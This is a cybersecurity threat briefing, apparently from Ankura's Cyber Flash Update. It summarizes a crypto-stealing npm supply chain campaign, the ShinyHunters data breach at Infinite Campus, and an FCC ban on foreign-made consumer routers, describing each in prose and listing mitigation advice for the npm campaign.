Malware Activity
Ghost Campaign Abuses npm Install Process to Deliver Stealthy Crypto-Stealing Malware
A newly identified supply chain attack campaign, dubbed the “Ghost campaign” by ReversingLabs, leverages malicious npm packages that mimic legitimate installation activity to covertly deploy malware targeting sensitive data and cryptocurrency wallets. First observed in early February 2026, the campaign uses deceptive techniques such as fake npm installation logs, including simulated dependency downloads, progress indicators, and delays, to create the illusion of a normal install process. During this staged execution, victims are prompted to enter their sudo password under the cover of resolving installation issues or performing optimizations, and the credentials are then used to execute a remote access trojan (RAT). The final payload is retrieved from external infrastructure, including Telegram channels and hidden web3-hosted content, decrypted using a remotely fetched key, and executed locally. The malware enables attackers to exfiltrate crypto wallet data, harvest sensitive information, and maintain command-and-control (C2) access. Code similarities across multiple packages suggest either an emerging campaign or an early-stage testing phase, aligning with a broader trend of increasingly sophisticated npm-based supply chain attacks. Researchers emphasize mitigation measures such as verifying package maintainers, scrutinizing install scripts, avoiding unnecessary privilege escalation, and leveraging automated security scanning tools to detect malicious dependencies. CTIX analysts will continue to report on novel malware strains and attack methods.
Threat Actor Activity
ShinyHunters Behind Infinite Campus Data Breach, Targeting Salesforce Account
Infinite Campus, a leading K-12 student information system provider, has notified customers of a data breach following an extortion attempt by the threat group ShinyHunters. Hackers accessed an employee’s Salesforce account, exposing mostly publicly available information. Although Infinite Campus hasn’t issued an official statement, customers reported the breach online. ShinyHunters, known for targeting Salesforce accounts, threatened to leak the stolen data unless contacted by March 25, 2026. Infinite Campus, however, refuses to engage with the attackers. ShinyHunters claims to have stolen Salesforce records containing personally identifiable information (PII) and internal corporate data. Infinite Campus serves over 3,200 US school districts, managing data for 11 million students across forty-six (46) states. The company maintains that no customer databases were accessed, and the exposed data mainly includes directory information commonly found on school websites. In response, Infinite Campus has disabled certain services without IP restrictions to minimize potential data exposure and is scanning Salesforce data for any compromise. The incident is reminiscent of the December 2024 PowerSchool hack, although its impact was smaller, with PowerSchool exposing sensitive information of 62 million students.
Vulnerabilities
FCC Bans Foreign-Made Consumer Routers Over Critical Infrastructure and Supply Chain Risks
The U.S. Federal Communications Commission (FCC) has announced a ban on the import and sale of new foreign-made consumer routers, citing significant cybersecurity and national security risks tied to supply chain vulnerabilities and exploitation by threat actors. Under the new policy, such routers are added to the Covered List unless they receive Conditional Approval from agencies like the Department of Homeland Security (DHS), effectively restricting their entry into the U.S. market while allowing continued use and sale of previously authorized devices. The decision follows findings that both state-sponsored and financially motivated actors have repeatedly leveraged insecure routers to enable network intrusions, espionage, password spraying, and large-scale botnet operations. Notably, China-linked groups attributed by multiple cybersecurity firms including Volt Typhoon, Flax Typhoon, and Salt Typhoon have used compromised routers to target U.S. critical infrastructure sectors, while the CovertNetwork-1658 (Quad7) botnet (attributed to Storm-0940) has facilitated stealthy credential attacks. The FCC emphasized that routers represent a high-value attack surface due to their role as network gateways, enabling surveillance, data exfiltration, and malware delivery when compromised, reinforcing the urgency of mitigating risks associated with foreign-manufactured networking equipment. CTIX analysts will continue to report on critical vulnerabilities to both private and state agencies/users.
📧 Never Miss a Briefing
Stay informed and secure. Subscribe to Ankura’s Cyber Flash Update, a bi-weekly briefing curated by our top cybersecurity experts. Receive timely insights on emerging threats, vulnerabilities and malicious actors to keep your systems secure.
Join the Cyber Flash Update community today.
© Copyright 2026. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
